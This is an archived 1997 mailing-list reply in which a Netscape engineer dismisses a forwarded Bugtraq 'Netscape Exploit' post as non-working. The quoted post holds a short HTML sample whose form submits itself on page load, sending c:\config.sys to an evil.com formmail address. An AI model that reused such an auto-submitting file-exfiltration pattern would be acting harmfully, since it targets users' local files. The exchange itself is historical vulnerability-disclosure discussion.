1997-06-15 - Re: Netscape Exploit
Header Data
From: Tom Weinstein <tomw@netscape.com>
To: Lucky Green <shamrock@netcom.com>
Message Hash: 4d5c256824e54cb8399578d1c40178d70ad19a8cf537b61d4e13933015258a18
Message ID: <33A3A827.5E05965@netscape.com>
Reply To: <3.0.2.32.19970614211018.03c32c1c@netcom13.netcom.com>
UTC Datetime: 1997-06-15 08:36:51 UTC
Raw Date: Sun, 15 Jun 1997 16:36:51 +0800
Raw message
From: Tom Weinstein <tomw@netscape.com>
Date: Sun, 15 Jun 1997 16:36:51 +0800
To: Lucky Green <shamrock@netcom.com>
Subject: Re: Netscape Exploit
In-Reply-To: <3.0.2.32.19970614211018.03c32c1c@netcom13.netcom.com>
Message-ID: <33A3A827.5E05965@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain
Lucky Green wrote:
>
> >Approved-By: aleph1@UNDERGROUND.ORG
> >Date: Sat, 14 Jun 1997 19:21:30 -0500
> >Reply-To: root <root@BACKWATER.PBX.ORG>
> >Sender: Bugtraq List <BUGTRAQ@NETSPACE.ORG>
> >From: root <root@BACKWATER.PBX.ORG>
> >Subject: Netscape Exploit
> >To: BUGTRAQ@NETSPACE.ORG
> >
> >Here is a sample it isn't complete but you get the basic idea of what
> is
> >going on
> ><HTML><HEAD><TITLE>Evil-DOT-COM Homepage</TITLE><HEAD>
> >
> ><BODY onLoad="daForm.submit()">
> ><FORM
> > NAME="daForm"
> > ACTION="http://evil.com/cgi-bin/formmail.pl"
> > METHOD=POST>
> >
> ><INPUT TYPE=FILE VALUE="c:\config.sys" Name="Save This Document on
> your
> >Harddrive">
> ><INPUT TYPE=HIDDEN NAME="recipient" value="foobar@evil.com">
Yeah, that's pretty cool. Too bad it doesn't work.
--
What is appropriate for the master is not appropriate| Tom Weinstein
for the novice. You must understand Tao before | tomw@netscape.com
transcending structure. -- The Tao of Programming |
Thread
Return to June 1997
- Return to “Lucky Green <shamrock@netcom.com>”
Return to “Tom Weinstein <tomw@netscape.com>”
- 1997-06-15 (Sun, 15 Jun 1997 12:12:43 +0800) - Netscape Exploit - Lucky Green <shamrock@netcom.com>
- 1997-06-15 (Sun, 15 Jun 1997 16:36:51 +0800) - Re: Netscape Exploit - Tom Weinstein <tomw@netscape.com>